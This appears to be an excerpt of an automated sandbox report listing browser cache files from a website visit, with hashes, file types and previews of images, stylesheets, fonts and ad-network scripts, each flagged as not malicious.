Preview:	.PNG........IHDR...X...:......l."....PLTE....p..o.....o...........(o.W..r..p........u..m....5.........q......./z.....X.....s..k..k..m..c..I..i..L..r..i..V.....e..X..u..v....o..._..p..]..........8s....t....{......S....$\.....d....d....2h....Q..A.....T...]..Ly.0j....{..H.?..i....\|.....9.g..]..@{.j......E..Y.I....IDATx....[....am. a."aH..a...RHB.RHIJ.6.v...#..`dlC..>7).5..~3.K.0......................................................................................................................g.>i.._cM....A`.;e.0...#..[.2.E<.....F...`!..........-.....a...;.\>,..<.+...h..]c.\|c.....V?...OG....sjW.\|g,...O..{W.o7..:..Fn,..{.h.qZ>.....M....,.u.o.#...e.............F3.J.t...f..........zTb?.\|...q..;q{2...V.....:..........5...nX...T..7A=.f...fm3.Q.Z.mY..?...rE.....-...d$G..05.v........Z..nxsSu..omyV..`....}h..p...(.......#.to_8.6.......?.......v..*nm?v.....92..<>2,7..S.,.S.=..y......O\.1CO....7..L.d@V..{.8.......T.\.T{..g.ui.)M.%........{..-x.

Chrome Cache Entry: 333

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (786)
Category:	dropped
Size (bytes):	1672
Entropy (8bit):	5.286735414643417
Encrypted:	false
SSDEEP:	48:bFj15yMuJcZ2E9uIic2u8aYlPFs3l7Q2xtHS:Fey2EYIic2u8bl9sJu
MD5:	AB304529064B2C30C88FC41AD81913E0
SHA1:	14091E21A049D97B052DD56FF4076898F6F7D0CC
SHA-256:	88C5A7E6C9B3319F4BE9CD873D1E19766A62BE628EA9921156DD2702F1D15031
SHA-512:	6F8A7C3D2516C88E172D6AF1F88B0F32242A737BA128F95E0668D57EE004384DAFE4011A84FC543BA477A7BC82A8D47862F1F276F0C89FA0087D63E4D3B72691
Malicious:	false
Reputation:	unknown
Preview:	(function(){'use strict';let e=[];const f=()=>{const a=e;e=[];for(const b of a)try{b()}catch{}};function g(a=document){return a.createElement("img")};function h(a=null){return a&&a.getAttribute("data-jc")==="26"?a:document.querySelector('[data-jc="26"]')};var k=document;/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=()=>{var a=k.querySelectorAll("link[data-reload-stylesheet][as=style][rel=preload]");for(var b=0;b<a.length;b++){var c=a[b],d="link",l=document;d=String(d);l.contentType==="application/xhtml+xml"&&(d=d.toLowerCase());d=l.createElement(d);d.setAttribute("rel","stylesheet");d.setAttribute("href",c.getAttribute("href"));k.head.appendChild(d)}if(a.length>0&&!(Math.random()>.01)){a=(a=h(document.currentScript))&&a.getAttribute("data-jc-rcd")==="true"?"pagead2.googlesyndication-cn.com":"pagead2.googlesyndication.com"; .b=(b=h(document.currentScript))&&b.getAttribute("data-jc-version")\|\|"unknown";a=`https://${a}/pagead/gen_204?id=jca

Chrome Cache Entry: 334

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1200 x 1200, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	6633
Entropy (8bit):	6.943099581411173
Encrypted:	false
SSDEEP:	96:YEjw2sjYKw1WIL2KMLgIk6AtTxgA6/e46arFDRlgj2P6uXfi1yMjCFEiHA:XsjUIC0N0Zox6WFDRGj2P66eTiHA
MD5:	E78B7BD4E07BFD2389ECB0C9BAF2D9C4
SHA1:	6EB12C9E3555267C211970C13B81C83718E0ABDE
SHA-256:	E4EF38A672DA0D57953164EE7D4BFD38E1C26789432C0A82B365AB16966CDAEB
SHA-512:	E175747221715C2F9F72F630BE044C836BE1D3063F8CF712BA6403BD4173BCDE7ED0950834F10BA46CEB8FC8E9ACDFE55620DC0A9C8376E274F9DF59E99E6949
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............C.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTEQ+..........xZ...]:.cA....r....T/......hG.......]9...y\..........iH....R,.w...._<......~b....V2......mM.....{....`=....d..........nN.............i....Y4......rS....S-......cA...l....Y5......sU.........n.....\|......gF....n....[7.........p......k.R-.......^;...._<.lL.vX.d..........}.U0..............eC.....T..j......Z6....rT...i..........a?.........V1....tU....{^.....................eD.......pP....W2.}`.....s.....x..jI.tV.......X3.h...a>.....~....kK..........wY...[7.....o...nO.b@......oP.\|_...u..pQ.f....\8......uW....lK...r.....\|...w.fE...qR.....g...jJ........{_.....t.....z...........wZ.q.........y.......hF....y[.}a....z].dB..L`....bKGD.f.\|d....tIME......)-u......IDATx......u...gHRn.I..A@QT.%....$...jec.(...h."..x#...eu]tM1W..M.T.....,[..2..l.u....5.pD.{:....}>..\|...y...3.=gR.........

Chrome Cache Entry: 335

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 600 x 314, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	12704
Entropy (8bit):	7.940138947736875
Encrypted:	false
SSDEEP:	384:S0SLNpV4j/EFBFYKDBttiwzbzX9nio92AN:AtW8FjtzzbL9iqF
MD5:	2D1055984E8C78EDDA088AB44B229469
SHA1:	7A8405751CCDD9BF68143E1C52ECD1BE5DC84275
SHA-256:	BFA18BE2B49E5A3A6C6F96754A2024F6D6536CAB05EE58EEBF473D09FE24C29D
SHA-512:	D70E6875E9DED81295DCE58D0ED66859130D7E65645E8F93CB685BD08FF508D53B6C722B9421871D77BED90E1F359B37446404494062266D609C2E25022B6E28
Malicious:	false
Reputation:	unknown
URL:	https://tpc.googlesyndication.com/simgad/9601954757734677083/14763004658117789537
Preview:	.PNG........IHDR...X...:......l."....PLTE.l.....k..m.....j.....h.....f.....l..a..e..j..m..^.By..H~.Cwl........P........]..S..Ez.T..N..a.....G.~......_..W..\........O..Bw............v....'y.C..m....&c.%].[..........'v.X..Xw.Ah.\|....(q....Br.~..[..k.......X..'X....B....\|..y..l.....V..}..Zz....... .IDATx..}......4.F..../!q.BBJ.Z..............,3..+$}...~.!l^$..s.M./.8.....\|..b..@.%p.!....X.'.b..@.%p.!....X.'.b..@.%p.!....X.'.b..@.%p..bi.........#.J......&Z%.~\..^..@`."9b_wBC.Kh#V.wB.e....5...V;EZ.ET............4&....pR..@.....M.%~3..C.zv.xAP.J hA.. 8}V3.Zb.Y......... ....P.\|..273.....# V.....</..........k........Z...$.b.n.u2m.-..=..W..!..i..X....B......._..uR..r._.Tu.o.n@.*.#W}....Y...kS.....W.u@........\|^.V}........v.+P...7D .....K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.....N ..8..K..B,.

Chrome Cache Entry: 336

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (53751)
Category:	dropped
Size (bytes):	55046
Entropy (8bit):	5.749770380617164
Encrypted:	false
SSDEEP:	1536:jLCOJQlBSkHifn5zBc6q2JH0aFdST3BgKxbb1p:x8qzRqYsTp1p
MD5:	8AB9CF4FA237449BD1F1271F003392BF
SHA1:	EF424F4EE8416D18B985DA975E2F1E364639CD7A
SHA-256:	C8A165693096954C937CD385433D2F2D63D5F4CD7A1CD6F3BEB418B6350304EA
SHA-512:	D70BD3E068BA6CFEB2199B3B46C6EF75EA47D9D42AB14B1037A2AA492F1B493C720FB22B445703C119C0DC8DEDAF81B8AC20F4B3B62CCFE6F4081AC6201F83B5
Malicious:	false
Reputation:	unknown
Preview:	//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function b(u){return u}var d=function(u,R,Q,g,B,O,N,Z,m,C,w,S){for(C=(w=12,g);;)try{if(w==79)break;else if(w==71)w=y.console?41:27;else if(w==u)C=g,w=71;else if(w==41)y.console[O](S.message),w=27;else{if(w==76)return Z;if(w==Q)C=52,Z=m.createPolicy(N,{createHTML:T,createScript:T,createScriptURL:T}),w=27;else{if(w==27)return C=g,Z;w==R?w=m&&m.createPolicy?Q:76:w==12&&(m=y.trustedTypes,Z=B,w=R)}}}catch(J){if(C==g)throw J;C==52&&(S=J,w=u)}},T=function(u){return b.call(this,u)},y=this\|\|self;(0,eval)(function(u,R){return(R=d(92,19,40,87,null,"error","bg"))&&u.eval(R.createScript("1"))===1?function(Q){return R.createScript(Q)}:function(Q){return""+Q}}(y)(Array(Math.random()*7824\|0).join("\n")+['//# sourceMappingURL=data:application/json;ch

Chrome Cache Entry: 337

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	2296
Entropy (8bit):	4.861786579524867
Encrypted:	false
SSDEEP:	48:neDeJeOGHn//x8Vqyyh4nzf6d0t0BQ8KxVqewa3VZwh3d1jm:neked//xOyh4uPBQ8OVjwaPwhtJm
MD5:	725883252D3798533CB8C934B6020920
SHA1:	3D18A6941643AF0D235ED99288F6355AB9062342
SHA-256:	343CAA89482BB66A232AA1AFF556A3948A48ABED7D708A8FA54C09A6ACB83D00
SHA-512:	3DED5A6ED04BD0EAC8B87F99FA5BA69BF97840B3229EEA41A806CB54106482C8A426915EB1E6962EBA81234A495C5239FE6BF29CC8ED6416EE8D5EA7C2E853F6
Malicious:	false
Reputation:	unknown
URL:	https://trksyln.net/resources/css/projectCard.css
Preview:	./@import url("https://fonts.googleapis.com/css2?family=Baloo+2&display=swap");/......a, a:hover {.. text-decoration: none;.. transition: color 0.3s ease-in-out;..}..../* Cards */...postcard {.. flex-wrap: wrap;.. border: 2px solid white;.. display: flex;.. box-shadow: 0 4px 21px -12px rgba(0, 0, 0, 0.66);.. border-radius: 10px;.. margin: 0 0 2rem 0;.. overflow: hidden;.. position: relative;.. .postcard__img....{.. max-height: 180px;.. width: 100%;.. object-fit: fill;.. position: relative;.. background: inherit;..}.....postcard__img_link {.. display: contents;..}.....postcard__bar {.. width: 50px;.. height: 10px;.. margin: 10px 0;.. border-radius: 5px;.. background-color: #5d2f91;.. transition: width 0.2s ease;..}.....postcard__text {.. padding: 1.5rem;.. position: relative;.. display: flex;.. flex-direction: column;..}.....postcard__preview-txt {.. overflow: hidden;.. text-overflow: ellipsis;..

Chrome Cache Entry: 338

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 339

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1560)
Category:	dropped
Size (bytes):	1775
Entropy (8bit):	5.0855295906697
Encrypted:	false
SSDEEP:	48:dvPioG+d99D9ND9dKh2EZGS1eYzs9SHgm4:tP6u9RNRdKbgMGSM
MD5:	A5A0C9048EFB7CB5DF90023064D09BA4
SHA1:	9669B2608D986D4742DD2C0C114B148B6CDB5CDE
SHA-256:	DDFBE9EE1F7088339A85FA25A259765ADE4258C082A7921B9F569FF9616F904A
SHA-512:	97ED945E9CEFE0C070946F5D97E9D641FB7B1D9EC710DC3865D307E9F59E07D238084699D3C4E52E2F470A207AEE0E19C9C1939333DFEF041769976A0F5F1B48
Malicious:	false
Reputation:	unknown
Preview:	/!. Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-solid-900.woff2) format("woff2"),url(../webfonts/free-fa-solid-900.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-brands-400.woff2) format("woff2"),url(../webfonts/free-fa-brands-400.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-regular-400.woff2) format("woff2"),url(../webfonts/free-fa-regular-400.ttf) format("truetype");unicode-range:u+f003,u+f006,u+f014,u+f016-f017,u+f01a-f01b,u+f01d,u+f022,u+f03e,u+f044,u+f046,u+f05c-f05d,u+f06e,u+f070,u+f087-f088,u+f08a,u+f094,u+f096-f097,u+f09d,u+f0a0,u+f0a2,u+f0a4-f0a7,u+f0c5,u+f0c7,u+f0e5-f0e6,u+f0eb,u+f0f6-f0f8,u+f10c,u+f114-f

Chrome Cache Entry: 340

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (786)
Category:	downloaded
Size (bytes):	1672
Entropy (8bit):	5.286735414643417
Encrypted:	false
SSDEEP:	48:bFj15yMuJcZ2E9uIic2u8aYlPFs3l7Q2xtHS:Fey2EYIic2u8bl9sJu
MD5:	AB304529064B2C30C88FC41AD81913E0
SHA1:	14091E21A049D97B052DD56FF4076898F6F7D0CC
SHA-256:	88C5A7E6C9B3319F4BE9CD873D1E19766A62BE628EA9921156DD2702F1D15031
SHA-512:	6F8A7C3D2516C88E172D6AF1F88B0F32242A737BA128F95E0668D57EE004384DAFE4011A84FC543BA477A7BC82A8D47862F1F276F0C89FA0087D63E4D3B72691
Malicious:	false
Reputation:	unknown
URL:	https://tpc.googlesyndication.com/pagead/js/r20241028/r20110914/client/load_preloaded_resource_fy2021.js
Preview:	(function(){'use strict';let e=[];const f=()=>{const a=e;e=[];for(const b of a)try{b()}catch{}};function g(a=document){return a.createElement("img")};function h(a=null){return a&&a.getAttribute("data-jc")==="26"?a:document.querySelector('[data-jc="26"]')};var k=document;/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=()=>{var a=k.querySelectorAll("link[data-reload-stylesheet][as=style][rel=preload]");for(var b=0;b<a.length;b++){var c=a[b],d="link",l=document;d=String(d);l.contentType==="application/xhtml+xml"&&(d=d.toLowerCase());d=l.createElement(d);d.setAttribute("rel","stylesheet");d.setAttribute("href",c.getAttribute("href"));k.head.appendChild(d)}if(a.length>0&&!(Math.random()>.01)){a=(a=h(document.currentScript))&&a.getAttribute("data-jc-rcd")==="true"?"pagead2.googlesyndication-cn.com":"pagead2.googlesyndication.com"; .b=(b=h(document.currentScript))&&b.getAttribute("data-jc-version")\|\|"unknown";a=`https://${a}/pagead/gen_204?id=jca

Chrome Cache Entry: 341

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
Category:	dropped
Size (bytes):	604
Entropy (8bit):	7.573620174038291
Encrypted:	false
SSDEEP:	12:6v/7dkfFQPHl09Kor6EHz1g+WVmObBbBbaLPIpTIiVojx5cF8NonhstcAzhu1:CkEl0nr6EHz1VWV33ePIpTzVojx5p6nH
MD5:	7BD42E5A35B5FB3FF852D6EA9191CA83
SHA1:	8A141EB392A05A2DEA3DCD83B97940EF70A81EBC
SHA-256:	5C4A713EE4250851232BE9F9F68D41586BE39B299528CFC7266E0B0E7E582E1B
SHA-512:	6FF31ACB937D6944570A837BB77AED92DAE41D71681440DC4765758FC40585F55999F2CDD78C4CE76A5AB414331BA9959BAFCFEF7E85B756AAB899C247F02890
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...0...0.......1....#IDATx...MKTQ...3...K...gP.Eo.Z$..6......"0..."..E-Z...C....+..E.T...JH/.HC.$d...y..."..W...w.3..3..9... ^..Fr4R.Q.....H<...\...V.[...v.L.D...y.wYQ....]....w&...\|F...iz8..b.s.r..[.H..5..5D..[@.ed.-...O..=..G..lpD.R.F".J....... .. y..$>.)V.`..quuP4.W9.}......y......~E}.7....IU.~.!.Ak.>....A..o..._.....7.4...{.K..6o.O..5.0n.`..z...V."^. 0.x=..^M...*t...H..9.B.(UD..>heD......."....W..T.E..0D.fYfI..3.-.G".....#.p....q.......Bv..{5.!u.F.i.......[.s.)....I....v.....Y.P.5?...n.'.......;...T......f......Q...~...8.....h.......T3<........IEND.B`.

Chrome Cache Entry: 342

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (608)
Category:	dropped
Size (bytes):	823
Entropy (8bit):	5.079251934712805
Encrypted:	false
SSDEEP:	24:e0vPioGlUrd033xLpxghnd0sH3xtpx2hnd0sQ3rpAhY:dvPioG+d7DDSDDjO
MD5:	8972AE5004BC634FFA6641BE3960E78A
SHA1:	235AECDFE4A45217D75FE7ABFBB5B12E3B28CC6E
SHA-256:	7F264C31CDB355F351235359240C30ACAE2BBE0A43C73FA6A035123E6D953A01
SHA-512:	F2CD81DC263916A1B47FDBCC58055BA4D3DB4C98FA9E9088776D695457B7BC974F3DFD217389A3E86FED0046313649D3626467AE63502967698406DDA4CFE3C5
Malicious:	false
Reputation:	unknown
Preview:	/!. Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */@font-face{font-family:"Font Awesome 5 Brands";font-display:block;font-weight:400;src:url(../webfonts/free-fa-brands-400.woff2) format("woff2"),url(../webfonts/free-fa-brands-400.ttf) format("truetype")}@font-face{font-family:"Font Awesome 5 Free";font-display:block;font-weight:900;src:url(../webfonts/free-fa-solid-900.woff2) format("woff2"),url(../webfonts/free-fa-solid-900.ttf) format("truetype")}@font-face{font-family:"Font Awesome 5 Free";font-display:block;font-weight:400;src:url(../webfonts/free-fa-regular-400.woff2) format("woff2"),url(../webfonts/free-fa-regular-400.ttf) format("truetype")}

Chrome Cache Entry: 343

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	362497
Entropy (8bit):	5.804607729377401
Encrypted:	false
SSDEEP:	6144:qG67mT1pcgnsIRKGnol7NOMX9REZW/DeaWChnrlQG6bb6t/wX1xaUImS:bT1JnecZW/hWYQG6b2t/0xalN
MD5:	3FAAB80E46B71CE8C20DD9AA4715141A
SHA1:	B2EDC3C44423D0FF09A1106D82EE93B8592C99E8
SHA-256:	8D5F233F5692D21627EF766AF6A32D7E1A53B1A39D3098F258478BB5B131544F
SHA-512:	3C1ED23EC47E7FC957E39CE4BD7071E387AB4791A7B99CABB0E356166AC7201E872EC2F2F0B108FDD76C410E95251D355B253D46FC98B3E6D80508144FEB339A
Malicious:	false
Reputation:	unknown
URL:	https://googleads.g.doubleclick.net/pagead/ads?gdpr=0&client=ca-pub-9495854422341365&output=html&adk=1812271804&adf=3025194257&abgtt=6&lmt=1730398767&plat=2%3A16777216%2C3%3A65536%2C4%3A65536%2C9%3A32776%2C16%3A8388608%2C17%3A32%2C24%3A32%2C25%3A32%2C30%3A34603008%2C32%3A32%2C41%3A32%2C42%3A32&format=0x0&url=https%3A%2F%2Ftrksyln.net%2FError&pra=5&wgl=1&aihb=0&asro=0&ailel=1~2~4~6~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aiael=1~2~4~6~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aicel=33~38&aifxl=29_18~30_19&aiixl=29_5~30_6&aslmct=0.7&asamct=0.7&aiict=1&aiopts=1&aief=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1730398763282&bpp=14&bdt=1933&idt=3924&shv=r20241028&mjsv=m202410240101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&nras=1&correlator=5363632696827&frm=20&pv=2&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=-12245933&ady=-12245933&biw=1017&bih=870&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C31088482%2C95344187%2C95335245%2C95345472%2C95345789%2C95345963%2C95345966&oid=2&pvsid=2973902258960805&tmod=55193809&uas=0&nvt=1&fsapi=1&ref=https%3A%2F%2Ftrksyln.net%2Ftgmacro%2Fdownload&fc=1920&brdim=10%2C10%2C10%2C10%2C1280%2C0%2C1050%2C964%2C1034%2C870&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=32768&bc=31&bz=1.02&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=1&uci=a!1&fsb=1&dtd=3998
Preview:	<script>window.sra_later_blocks = [];</script><script>window.sra_later_blocks.push({creative:'\x3c!doctype html\x3e\x3chtml \x3e\x3chead\x3e\x3cstyle\x3e* {margin: 0;padding: 0;outline: none;}body {background: rgba(52, 58, 65, 0.600000);backdrop-filter: blur(15px); /potential issue: minimal browser support/-webkit-backdrop-filter: blur(15px); /for safari/height: 100%;}#ad_iframe {box-shadow: 0 !important;display: block;left: auto;margin: 0 auto;position: relative;top: auto;}.creative {transition: opacity 1s;-webkit-transition: opacity 1s;position: relative;}#card {background: #FFFFFF;border-radius: 30px;padding: 0 0px 0px;position: absolute;}html {height: 100%;}.toprow {width: 100%;display: flex;height: 24px;background: #FFFFFF;border-radius: 30px 30px 0 0;align-content: center;align-items: center;}.btn {display: table;transition: opacity 1s, background .75s;-webkit-transition: opacity 1s, background .75s;-moz-transition: opacity 1s, background .75s;-o-transition: opacity 1s, backg

Chrome Cache Entry: 344

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2415)
Category:	dropped
Size (bytes):	2754
Entropy (8bit):	5.193623900439384
Encrypted:	false
SSDEEP:	48:fwNdf9pTzTPvwsR2r2U4b3Ybk5JwYsH2/zlq9/S2sQBiETswEqHBnAFswkcK0MUG:f4df9hTHwsR2jk5sH2/2VzTmq6kRMkL
MD5:	1CBBCCA1D53705256FE48B2DE6354B29
SHA1:	3B0B68688A39F7109FA0A709A8B74EE690A97F4D
SHA-256:	935B0999723A39EBAA3777EBCE2ED743881FD3776AA10393CE760AB0DBEACDF1
SHA-512:	1A00FCC414F9C4EE9D046FB2A8F64B5219D06237B538F92972B8187F00A8942837B5EB734268855EAE1D4459FB19D9A5992D96064397C50B8DDC4EADCD376ED8
Malicious:	false
Reputation:	unknown
Preview:	/*. Minified by jsDelivr using Terser v5.19.2.. * Original file: /npm/bootstrap-affix@1.0.1/assets/js/affix.js. . Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files. */.!function(t){"use strict";var i=function(e,o){this.options=t.extend({},i.DEFAULTS,o),this.$target=t(this.options.target).on("scroll.bs.affix.data-api",t.proxy(this.checkPosition,this)).on("click.bs.affix.data-api",t.proxy(this.checkPositionWithEventLoop,this)),this.$element=t(e),this.affixed=null,this.unpin=null,this.pinnedOffset=null,this.checkPosition()};function e(e){return this.each((function(){var o=t(this),f=o.data("bs.affix"),n="object"==typeof e&&e;f\|\|o.data("bs.affix",f=new i(this,n)),"string"==typeof e&&f[e]()}))}i.VERSION="3.3.7",i.RESET="affix affix-top affix-bottom",i.DEFAULTS={offset:0,target:window},i.prototype.getState=function(t,i,e,o){var f=this.$target.scrollTop(),n=this.$element.offset(),s=this.$target.height();if(null!=e&&"t

Chrome Cache Entry: 345

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1200 x 628, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	41970
Entropy (8bit):	7.952243493903504
Encrypted:	false
SSDEEP:	768:QYRIdacymFQ0cVzWw5DN81+yV7OHML2fWcOKmJgF7QvIeySrCk/8t3f+qZ4C:lGOmFQ0ch5DNq7OHVOyv8PHWEI3f74C
MD5:	E9681E558391DD7368AC7E0828FFFE77
SHA1:	A0B030B8914A2DA1F155DB53EFEF5E56EC348148
SHA-256:	A57F6E4555D516B7A1BFF5D1EE889728561AD2E4D5275B50A462914315DD9CF5
SHA-512:	BEBFDA119694BA8AEA8A9177C664C78399C94995CBDB33E610B562DC29B19176E30AE0F6F24DD4E7837D16369F1A608C6672EB506A7877B3BDB575C59EEBA9FA
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.......t.....5Ve....PLTE.......)..'..*........+.........&.....%....~'.y...<........x#...n..t....\....L..dD.z%.q..s%....S....d .L..y'.wZ.x..f...t.c ..........t$.K$....m#.F(..{......Z..Q...S.U.....c..q"......D........g!.s#..`..P.T..@......A..p..i=.H..R.._......z......G..W..o.]".J".K....^.....\..A..=......S..f.....D..h..I.b.....{..^.rP.~.f...~<.vK.mB.d.U>.Z/.Q#.z.mB.d$..]..o.n=.{J.=..l.<..s`.^8..o.p..v.O0..m.sZ.`C.WB.U(.m0.J-.H6.pW..eA.M....eW.3.......\-....}v...3..:..gW.,......... .IDATx......^8..@7\|..`... ."C;.h.d(..$mY$-Q.EJ.......&..,.....x.4..f.<.2..s........Q<...$....}...L.D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H

Chrome Cache Entry: 346

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1200 x 627, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	3875
Entropy (8bit):	7.21080746216504
Encrypted:	false
SSDEEP:	96:oMFiuNE7qj8MThYnWHK8HF3LLDNrFPX05c39:7NNgATXK2dPNrFPH
MD5:	BD1466C2FFB9640B0C062AEE954C83B2
SHA1:	E27657B673A90092D21E1F2AB7519FB78176A9EC
SHA-256:	3F1BCC40B33449E15AE643DA68AD4DF9E525197DBEF09CBC612661B64C4A583D
SHA-512:	8C4016579573B081773D2F58BF5AB905187AC78BE20E1DCBE48A17D03084E9E2E878BF8061409D3DA388BCE7B97189D2C4E39FC712DB5F0614FDCD18919A6CB5
Malicious:	false
Reputation:	unknown
URL:	https://tpc.googlesyndication.com/simgad/6298018922848964462/14763004658117789537
Preview:	.PNG........IHDR.......s.....(S.....~PLTE.o....<........)w.v...z.o.............._....."r.d.....%t....~..W.....4~......................B..M..O..r.....>.......................`IDATx....Z.J..P..Q.E.QDm......b.2.D......_..kW..............................................................................................................................................................................................................................................................................................................................s...[....dvq:.^6..jc:../.....}W....q5j.\|.......;m....Y{.....lp0.L.....w.'.Wo....#..\|.V..U..b..m...kWI..w.1..ut.Q\.,.......O...O.9.]-....l...Z=...{....S......u.w..U.Y......-.W......{<]_...u.k.&._..~.E..JI...U?;.....X..J.Uu....,`wjE....r,...N..a...N`.;3.,.j...0.yF`.;..ux................)......0....,x..z.~..8e@....q$......h..p....U.W.....F..s...+.......y0y....K...#..:......u.....V.Xy..N...I.U.3.Z......X.?.5...8...[r.G....u..f.

Chrome Cache Entry: 347

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 728 x 90, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	6903
Entropy (8bit):	7.777210754393487
Encrypted:	false
SSDEEP:	96:30eNlhZHntC09e9qBRdjvmTSP4t++XrO2wXQ0RjBfv5oEIdJ+G/IGQL38l66hNyI:7NvZHtPziu4EEpPqVo52L31p2/5tig
MD5:	CF4B5E15C04BB2DF72FDE2DF1C2F923D
SHA1:	E59FC7341473D3FAABBFAF63EEB9CA1D188B2D13
SHA-256:	2FE00C96B722401ECFA65A37FD463901DC91CCCCB4B789CE8D6EE0AA5073A2AF
SHA-512:	0BD9F95865D43093D9570AAFA7147E65020CC2939733CC59FA9A68FF6127C012DEFCBA0F340E44C76CEB545A0995D9D4D8C833F026216FC188394C4ADF963609
Malicious:	false
Reputation:	unknown
URL:	https://tpc.googlesyndication.com/simgad/6406916910759228465?sqp=4sqPyQQ7QjkqNxABHQAAtEIgASgBMAk4A0DwkwlYAWBfcAKAAQGIAQGdAQAAgD-oAQGwAYCt4gS4AV_FAS2ynT4&rs=AOga4qnytqedF_Wj2pEhPy2B16MkyO7adg
